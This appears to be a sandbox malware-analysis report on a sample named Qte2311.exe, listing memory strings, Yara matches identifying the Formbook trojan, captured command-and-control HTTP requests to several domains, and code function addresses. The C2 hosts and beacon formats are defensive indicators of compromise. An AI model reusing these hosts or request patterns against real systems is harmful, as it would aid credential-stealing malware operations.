Source: runas.exe, 00000005.00000002.4110106920.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pjgfupyp.click/
Source: runas.exe, 00000005.00000002.4110106920.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pjgfupyp.click/2
Source: runas.exe, 00000005.00000002.4110106920.0000000003363000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pjgfupyp.click/do6
Source: runas.exe, 00000005.00000002.4113575754.0000000007D2B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.pjgfupyp.click/u0t4/?ipNhfX=1CC
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Qte2311.exe, 00000000.00000002.1663251257.0000000005F90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.comX
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Qte2311.exe, 00000000.00000002.1663313621.0000000007672000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/1.20.2/TweenMax.min.js
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Roboto
Source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
Source: runas.exe, 00000005.00000002.4110106920.0000000003334000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: runas.exe, 00000005.00000002.4110106920.0000000003334000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: runas.exe, 00000005.00000002.4110106920.0000000003334000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: runas.exe, 00000005.00000002.4110106920.0000000003334000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: runas.exe, 00000005.00000003.1974318457.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/MorphSVGPlugin.min.js
Source: runas.exe, 00000005.00000002.4111828153.0000000006608000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000003668000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://s3-us-west-2.amazonaws.com/s.cdpn.io/16327/SplitText.min.js
Source: runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: runas.exe, 00000005.00000003.1982686617.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: runas.exe, 00000005.00000002.4111828153.0000000005E2E000.00000004.10000000.00040000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4111192634.0000000002E8E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.rva.info/u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK
Source: unknown HTTP traffic detected: POST /u0t4/ HTTP/1.1Host: www.owcojyyde.bestAccept: */*Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.owcojyyde.bestReferer: http://www.owcojyyde.best/u0t4/Connection: closeContent-Length: 187Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36Data Raw: 69 70 4e 68 66 58 3d 65 38 4d 4e 48 2f 79 31 58 75 44 53 65 46 45 52 39 37 59 31 48 36 6d 37 36 78 67 55 2b 76 36 51 50 34 4f 6a 33 6b 77 46 68 64 71 35 76 4d 39 70 75 43 4b 46 6c 42 48 46 67 43 44 2f 57 32 51 33 61 30 36 6f 51 78 2b 73 38 45 38 78 52 35 73 32 2f 72 39 6b 62 4d 42 55 49 73 4c 58 58 2b 41 79 59 48 74 4e 4d 6b 42 41 35 64 59 31 41 4d 64 4b 4f 55 75 46 79 46 4d 58 73 41 76 49 61 64 6a 4f 43 77 4a 77 2b 7a 79 53 36 57 6c 61 46 78 4b 50 75 6b 6b 55 33 5a 32 76 4f 6f 57 46 79 65 33 49 4b 36 6a 44 47 63 71 42 37 6b 62 77 66 75 4f 4b 4f 41 3d 3d Data Ascii: ipNhfX=e8MNH/y1XuDSeFER97Y1H6m76xgU+v6QP4Oj3kwFhdq5vM9puCKFlBHFgCD/W2Q3a06oQx+s8E8xR5s2/r9kbMBUIsLXX+AyYHtNMkBA5dY1AMdKOUuFyFMXsAvIadjOCwJw+zyS6WlaFxKPukkU3Z2vOoWFye3IK6jDGcqB7kbwfuOKOA==
Source: unknown DNS traffic detected: queries for: www.drtonks.com
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=yeZb8GK9kb308m6tqpQSWKVePpKokD/DhHuephdMkCBCe/gXfDvon4YRbmogRZs51d24yXmjv9s2GuQK2J30uG9jNiVx5pUDTA==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.drtonks.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=T+ktEIOjX9T5dGcj9rUsXIa48WZT28SiLvO+yVBZwvWEp9g0wSKFlyHjxBvBWF4XQFrqNUOHqhRxKaY3zbxWdu06McXUafUYdA==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.owcojyyde.bestAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=pk6UlYKypwTcdRigHYvXwaXnbRoM4y7Rx6CIM21Q8kT0nxxz4tr7Q0wSojmMfoxURV3iEB8rSWMGZNGZ3jUdb07QIb/TctJEsw==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.majinfo.techAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=0FEhcIE8iszkrFK7conPxoTSm5tbS5zDq5Q/wzqttSHPlx8Adeeig0MIJDbK+dlDXWJ9cmev8ZYmFh9Bk+wzUoT6TgNjxSlOMQ==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.rva.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=4EteGVMU5QusLCd8WOgjQMJSMXeXzA2vwQTj1x/Wv0fSPBpLzP4ZjqwCxd5WAfB87rYwoEydCHJiwFyGwE65y6hYDNnXCDKbTA==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.ghswanhar.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=ZUvXaveAn+Mj+tnST7bSiJ2JwfpFPPY9VKgiVLhz9pIo5hypx732FJmQOFcPVCgcsF350nabn4Y8nAcrKLrIHurvDd/yCXFvmw==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.arteunmapa.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36
Source: global traffic HTTP traffic detected: GET /u0t4/?ipNhfX=XNk/b9CReA2PmrT6V9nRJKml7Bwv5n/yLOhYcFkNWR1WhWm4S78oywurhHAd6q+OOWdCw7RAri9AvuhxeeQNKzba3a077jm8zA==&DDMD=2V_pWNT8ifT HTTP/1.1Host: www.beautwin.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2483.0 Safari/537.36

E-Banking Fraud

barindex
Source: Yara match File source: 3.2.Qte2311.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.Qte2311.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 3.2.Qte2311.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.Qte2311.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Qte2311.exe.5d80000.10.raw.unpack, RFebBaClhEWIFvwxqU.cs Large array initialization: : array initializer size 9041
Source: 0.2.Qte2311.exe.3573c38.7.raw.unpack, RFebBaClhEWIFvwxqU.cs Large array initialization: : array initializer size 9041
Source: Qte2311.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 3.2.Qte2311.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.Qte2311.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4111214775.0000000004EF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1744367221.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4109845819.0000000002F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1744799912.0000000001780000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4112751234.00000000047A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4111173567.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4110917512.0000000002350000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.1747250479.0000000001B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01AEF698 0_2_01AEF698
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01AECE1C 0_2_01AECE1C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01AEF688 0_2_01AEF688
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D42106 0_2_07D42106
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D4C100 0_2_07D4C100
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D4C0F2 0_2_07D4C0F2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D4C0B9 0_2_07D4C0B9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D49D1F 0_2_07D49D1F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D49D30 0_2_07D49D30
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_07D42C38 0_2_07D42C38
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00401A3C 3_2_00401A3C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00410073 3_2_00410073
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040287C 3_2_0040287C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00403001 3_2_00403001
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00403010 3_2_00403010
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040E0F3 3_2_0040E0F3
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004048F8 3_2_004048F8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00402880 3_2_00402880
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00403109 3_2_00403109
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040110C 3_2_0040110C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00401110 3_2_00401110
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00401240 3_2_00401240
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040E237 3_2_0040E237
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00402B59 3_2_00402B59
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00402B60 3_2_00402B60
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0041631E 3_2_0041631E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00416323 3_2_00416323
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00401C55 3_2_00401C55
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0042A413 3_2_0042A413
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004034D0 3_2_004034D0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00403484 3_2_00403484
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040FE4B 3_2_0040FE4B
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040FE53 3_2_0040FE53
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004026A7 3_2_004026A7
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004026B0 3_2_004026B0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019041A2 3_2_019041A2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019101AA 3_2_019101AA
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019081CC 3_2_019081CC
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01840100 3_2_01840100
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018EA118 3_2_018EA118
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D8158 3_2_018D8158
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018E2000 3_2_018E2000
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185E3F0 3_2_0185E3F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_019103E6 3_2_019103E6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190A352 3_2_0190A352
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018D02C0 3_2_018D02C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F0274 3_2_018F0274
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01910591 3_2_01910591
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01850535 3_2_01850535
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018FE4F6 3_2_018FE4F6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F4420 3_2_018F4420
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01902446 3_2_01902446
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0184C7C0 3_2_0184C7C0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01874750 3_2_01874750
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01850770 3_2_01850770
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0186C6E0 3_2_0186C6E0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018529A0 3_2_018529A0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0191A9A6 3_2_0191A9A6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01866962 3_2_01866962
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018368B8 3_2_018368B8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0187E8F0 3_2_0187E8F0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01852840 3_2_01852840
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185A840 3_2_0185A840
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01906BD7 3_2_01906BD7
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0190AB40 3_2_0190AB40
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0184EA80 3_2_0184EA80
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01868DBF 3_2_01868DBF
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0184ADE0 3_2_0184ADE0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0185AD00 3_2_0185AD00
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018ECD1F 3_2_018ECD1F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018F0CB5 3_2_018F0CB5
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01840CF2 3_2_01840CF2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01850C00 3_2_01850C00
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018CEFA0 3_2_018CEFA0
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01842FC8 3_2_01842FC8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01892F28 3_2_01892F28
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01870F30 3_2_01870F30
